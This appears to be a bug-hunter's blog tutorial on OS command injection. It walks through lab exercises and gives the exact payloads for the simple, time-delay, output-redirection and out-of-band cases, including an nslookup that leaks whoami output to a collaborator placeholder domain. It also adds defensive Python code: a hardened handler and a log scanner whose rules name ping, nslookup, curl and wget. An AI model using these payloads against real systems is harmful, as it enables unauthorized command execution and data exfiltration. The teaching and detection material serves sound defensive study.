What is OS Command Injection?
Well!!! Hello everyone! It’s ravitbughunter back again. I hope you are all doing very well. Today we will learn about command injection. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.
Types of OS Command Injection:
- OS command injection, simple case
- Blind OS command injection with time delays
- Blind OS command injection with output redirection
- Blind OS command injection with out-of-band interaction
- Blind OS command injection with out-of-band data exfiltration
1. OS command injection, simple case
Description: The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.
Steps to reproduce:
- Use Burp Suite to intercept and modify a request that checks the stock level.
- Modify the storeID parameter, giving it the value 1|whoami
- Observe that the response contains the name of the current user.
When you see the whoami output in the response, it means this website is vulnerable.
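What makes the simple case possible, and how to close it, is easiest to see in code. The following is an added example, not code from this post or from the lab: a Python handler that builds the stock-check command by string concatenation (the vulnerable pattern) next to one that allow-list validates both IDs and passes an argv list to subprocess without a shell. The script path /opt/app/stockreport.sh and the ID format (1 to 10 digits) are assumptions made for the example.

```python
import re
import shlex
import subprocess
import sys

# Hypothetical path of the stock-check script; the lab's real command is not shown on the page.
STOCK_SCRIPT = "/opt/app/stockreport.sh"

# Assumed format of a valid product or store ID: 1 to 10 digits, nothing else.
ID_PATTERN = re.compile(r"[0-9]{1,10}")


def vulnerable_command(product_id: str, store_id: str) -> str:
    """Build the command string the way a vulnerable handler would: request
    parameters concatenated into one string that is then handed to a shell.
    Nothing stops a parameter value from carrying shell operators."""
    return f"{STOCK_SCRIPT} {product_id} {store_id}"


def shell_tokens(command: str) -> list[str]:
    """Tokenise a command string with POSIX shell rules so the effect of a
    metacharacter is visible: '|' and '||' come out as separate operator
    tokens, and whatever follows them is parsed as a second command."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def validate_id(value: str, name: str) -> str:
    """Allow-list check: IDs are numeric, so anything else is rejected before
    a process is ever started."""
    if not ID_PATTERN.fullmatch(value):
        raise ValueError(f"{name} must be 1-10 digits, got {value!r}")
    return value


def hardened_argv(product_id: str, store_id: str) -> list[str]:
    """Validate both IDs, then return an argv list. Passing a list to
    subprocess.run without shell=True means no shell re-parses the values,
    so '|', '>' and backticks are ordinary characters inside one argument."""
    return [
        STOCK_SCRIPT,
        validate_id(product_id, "productId"),
        validate_id(store_id, "storeId"),
    ]


def run_argv(argv: list[str]) -> str:
    """Execute an argv list directly (no shell) and return its stdout."""
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=10, check=False)
    return completed.stdout


def echo_without_shell(value: str) -> str:
    """Show that a metacharacter-laden value survives as one literal argument
    when no shell is involved: a child Python process prints sys.argv[1]
    unchanged. sys.executable is used so this runs on any machine."""
    return run_argv([sys.executable, "-c", "import sys; print(sys.argv[1])", value]).strip()


if __name__ == "__main__":
    payload = "1|whoami"  # the simple-case value from the post
    print("shell sees:", shell_tokens(vulnerable_command("1", payload)))
    print("argv form passes literally:", echo_without_shell(payload))
    try:
        hardened_argv("1", payload)
    except ValueError as exc:
        print("hardened handler rejected it:", exc)
```

Running it shows the shell splitting the post's 1|whoami value into a second command, the same value surviving as a single literal argument when no shell is involved, and the hardened path rejecting it before any process starts. Validation is the first line of defence; the argv form matters even more, because it still holds for values a pattern cannot fully constrain.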
2. Blind OS command injection with time delays
Description: The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. To confirm the vulnerability, exploit the blind OS command injection to cause a 10-second delay.
Steps to Reproduce:
- Use Burp Suite to intercept and modify the request that submits feedback.
- Modify the email parameter, changing it to: email=x||ping+-c+10+127.0.0.1||
- Observe that the response takes 10 seconds to return.
3. Blind OS command injection with output redirection
Description: The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
Steps to Reproduce:
- Use Burp Suite to intercept and modify the request that submits feedback.
- Modify the email parameter, changing it to: email=||whoami>/var/www/images/output.txt||
- Now use Burp Suite to intercept and modify the request that loads an image of a product.
- Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command: filename=output.txt
- Observe that the response contains the output from the injected command.
4. Blind OS command injection with out-of-band interaction
Description: The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
Steps to Reproduce:
- Use Burp Suite to intercept and modify the request that submits feedback.
- Modify the email parameter, changing it to: email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
- Right-click and select “Insert Collaborator payload” to insert a Burp Collaborator subdomain where indicated in the modified email parameter.
5. Blind OS command injection with out-of-band data exfiltration
Description: The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain. To confirm this vulnerability, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to confirm the vulnerability.
Note: To confirm the vulnerability, you must use Burp Collaborator’s default public server.
Steps to Reproduce:
- Use Burp Suite Professional to intercept and modify the request that submits feedback.
- Go to the Collaborator tab.
- Modify the email parameter, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated: email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
- Go back to the Collaborator tab, and click “Poll now”. You should see some DNS interactions that were initiated by the application as the result of your payload. If you don’t see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.
- Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Collaborator tab. The full domain name that was looked up is shown in the Description tab for the interaction.
- To confirm the vulnerability, enter the name of the current user.
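On the defensive side, the four blind variants above (time delay, output redirection, out-of-band interaction and out-of-band exfiltration) all leave a trace in the request parameters the application received, even when nothing shows in the response. The following is an added example, not part of this post: a small Python scanner that pulls query and form parameters out of access-log lines and flags the indicators each section relies on (shell operators, sleep/ping for time delays, redirection to an absolute path, nslookup/dig/curl/wget for out-of-band lookups). The log format, in particular the body="..." field for POST bodies, the sample lines themselves, and the collaborator domain example-collab.net are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Constructed log format (an assumption for this example): a combined-style
# access log where the application also appends the URL-encoded form body as
# body="..." on POST requests. A real server needs that logging configured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: body="(?P<body>[^"]*)")?$'
)

# Indicators matching the cases described in the post. The rule names are ours.
RULES = {
    "shell-operator": re.compile(r"\|\||&&|[|;&`]|\$\("),        # pipes, chaining, substitution
    "time-delay": re.compile(r"\b(?:sleep|ping)\b"),              # blind probing by delay
    "output-redirect": re.compile(r">\s*/"),                      # writing output under an absolute path
    "oob-lookup": re.compile(r"\b(?:nslookup|dig|curl|wget)\b"),  # out-of-band DNS/HTTP
}

# Constructed sample lines: one benign stock check, then one line per case.
# example-collab.net stands in for a collaborator domain.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /product/stock?productId=1&storeId=1 HTTP/1.1" 200 12',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /product/stock?productId=1&storeId=1%7Cwhoami HTTP/1.1" 200 18',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "POST /feedback/submit HTTP/1.1" 200 0 body="name=a&email=x%7C%7Cping+-c+10+127.0.0.1%7C%7C&message=hi"',
    '198.51.100.7 - - [10/Oct/2023:13:56:20 +0000] "POST /feedback/submit HTTP/1.1" 200 0 body="name=a&email=%7C%7Cwhoami%3E/var/www/images/output.txt%7C%7C&message=hi"',
    '198.51.100.7 - - [10/Oct/2023:13:56:45 +0000] "POST /feedback/submit HTTP/1.1" 200 0 body="name=a&email=%7C%7Cnslookup+%60whoami%60.example-collab.net%7C%7C&message=hi"',
]


def extract_params(line: str) -> dict[str, str]:
    """Return every decoded query-string and form-body parameter on a line.
    parse_qsl undoes percent-encoding and turns '+' back into a space, so the
    rules below see the value the way the application's shell would."""
    match = LOG_RE.match(line)
    if not match:
        return {}
    params: dict[str, str] = {}
    query = urlparse(match.group("path")).query
    params.update(parse_qsl(query, keep_blank_values=True))
    if match.group("body"):
        params.update(parse_qsl(match.group("body"), keep_blank_values=True))
    return params


def classify(value: str) -> list[str]:
    """Names of all rules that fire on one parameter value, sorted for stable output."""
    return sorted(name for name, pattern in RULES.items() if pattern.search(value))


def scan_log(lines: list[str]) -> list[dict]:
    """One finding per parameter that trips at least one rule."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for param, value in extract_params(line).items():
            hits = classify(value)
            if hits:
                findings.append({"line": number, "param": param, "value": value, "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['param']}={finding['value']!r} -> {', '.join(finding['rules'])}")
```

A rule set like this is noisy on its own (legitimate feedback text can contain a pipe or the word ping), so it belongs in a pipeline that correlates the hit with response latency, file creation under the web root, or unexpected DNS egress from the application host, which are exactly the side effects the respective sections use as proof.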
Impact:
A command injection vulnerability allows attackers to execute arbitrary system commands on the attacked party’s host operating system.
Thanks for connecting with Hackerinthehouse.
See you in the next post.